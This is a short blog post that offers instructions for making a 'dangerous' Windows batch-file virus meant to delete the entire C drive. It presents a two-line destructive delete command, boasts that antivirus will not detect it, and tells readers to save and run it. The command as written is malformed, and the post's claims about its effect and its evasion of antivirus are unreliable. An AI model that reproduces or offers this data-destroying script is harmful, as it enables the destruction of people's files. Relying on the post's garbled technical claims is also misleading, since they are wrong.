Everybody knows what a virus is. A person using a computer or laptop has faced a virus attack atleast once in their life. Viruses are all man made. This post will teach you how to make simple yet very powerful and dangerous computer virus using a batch file. No software is required to make this virus, Notepad is enough for it. The good thing about this virus is it is not detected by any AntiVirus (depends on your antivirus actually).
What will this virus do ?
This virus will delete the C Drive completely. This virus will be created using batch file programming.
How to Make the virus ?
1. Open Notepad and copy below code into it.
@Echo off
Del C:\ *.* |y
2. Save this file as virus.bat (Name can be anything but .bat is must)
3. Now, running this file will delete all the content of C Drive.
Warning: Trying this will delete all the content of your C Drive. DigitalEta will not be responsible for any damage done to your computer.
Discussion
No comments yet.